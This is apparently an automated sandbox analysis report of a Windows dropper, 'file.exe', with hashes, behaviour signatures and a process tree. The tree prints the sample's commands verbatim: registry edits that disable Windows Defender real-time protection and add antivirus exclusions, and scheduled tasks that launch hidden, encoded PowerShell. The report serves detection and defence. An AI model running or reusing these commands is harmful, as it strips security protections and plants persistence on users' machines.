Analysis
-
max time kernel
154s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
30-10-2022 17:25
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3b0c5f2340a8e359dc54b4d1a4a89b6a
-
SHA1
2bb5952c0413939d5eeae39bfdcf929b5eaf0d0a
-
SHA256
f9b99556e933fcb1d6b45e6288e36ea17d720ca35321874a2cd5471072d4f1bd
-
SHA512
6a05a00f08bc8d09adaf1a55099effb1d6bf18f640a332469e9fab8a6db9e5e44eb55f794de9fbbfbba62e44201a14f767260fff5972dde52ec210ba43830c9f
-
SSDEEP
196608:91OrAJ+1rJEqNsZFI0nt2toft+sca73VJr3RuCJ548Ug2eCbN6+:3OrAJgrJ6ZFI4oecmFx3gaWLeCx6+
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Drops file in System32 directory 7 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS80B5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS98F6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXZlPuBQC" /SC once /ST 13:40:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXZlPuBQC"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXZlPuBQC"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnSGuSkVMPStTmmuin" /SC once /ST 18:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh\ZLyVHNmXIWjCvSJ\yywPadh.exe\" PO /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A5E5AC8B-FE41-4058-B00D-9DFC649AA1A7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {A702BB09-58BD-4400-88A3-8F1A05048141} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh\ZLyVHNmXIWjCvSJ\yywPadh.exeC:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh\ZLyVHNmXIWjCvSJ\yywPadh.exe PO /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSbLJUMVM" /SC once /ST 11:11:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSbLJUMVM"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSbLJUMVM"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzsmnbWpj" /SC once /ST 06:16:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzsmnbWpj"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzsmnbWpj"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\nHELeprhPXmAcQZw\lpgGKUrB\gKFtaZKRehdwXIhe.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\nHELeprhPXmAcQZw\lpgGKUrB\gKFtaZKRehdwXIhe.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BfBXaCGqryvIC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BfBXaCGqryvIC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RILKhWvfNgUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RILKhWvfNgUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aZyDbPjGU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aZyDbPjGU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jHDOiLeiVJMQtvoevNR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jHDOiLeiVJMQtvoevNR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\miVPcBzbdjnU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\miVPcBzbdjnU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qWNxXtFdRGCpVhVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qWNxXtFdRGCpVhVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BfBXaCGqryvIC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BfBXaCGqryvIC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RILKhWvfNgUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RILKhWvfNgUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aZyDbPjGU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aZyDbPjGU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jHDOiLeiVJMQtvoevNR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jHDOiLeiVJMQtvoevNR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\miVPcBzbdjnU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\miVPcBzbdjnU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qWNxXtFdRGCpVhVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qWNxXtFdRGCpVhVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nHELeprhPXmAcQZw" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbGZMdwUY" /SC once /ST 13:37:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
7KB
MD5cf0ee2a1406003f36feab3fca2155852
SHA1a74d3d9459851bbb399bf075138b1841a3a8c9d1
SHA256e6548aaa75aec9f2929e2f9e3a6ae23b3d4a27ad0813292d19bda3d80eff5ec1
SHA512e692c20a55bd2b6868c7803e0a7eefe4e2d18f67489db94408772cd9a656638aab97a74c4b201d13d501e8ad076154823b9662e5dd8d4de7aa31d5a6458c2d81
-
Filesize
7KB
MD5b0e26ed118acdd0f81f743656b1c5e87
SHA1dde421046705578f11a7da76ee57823200931095
SHA25656707c4e702ac4e0696ce8d366d09d74ddb25f13b654c5d86cedf0267f77d0c0
SHA51240d7b7eaca4d5962037e75498116c6c64b5265e6d703a37be2c2fb51561077bc4fe9202276cb9c157af8f65f3346bd85d490f9cdad0cc8f7a7c0f8b3b713252c
-
Filesize
8KB
MD5caaa575b157f53bb27c23a6880ecc647
SHA15d55cd172354437aa10046f286cc75ccfb0009db
SHA256dacc91166030c48e38cf83742f3c4228c5b4edf5e95d02ee770ad26e86e6e603
SHA5125e805ef8fb6f94e6f35d9f8f7fabe5858f18a51636526beb0f9d6c08ae0827e745bb4dd4827c28ab3f56ef86799074c70d6bf665887fc6e689d75d2742f1c49b
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
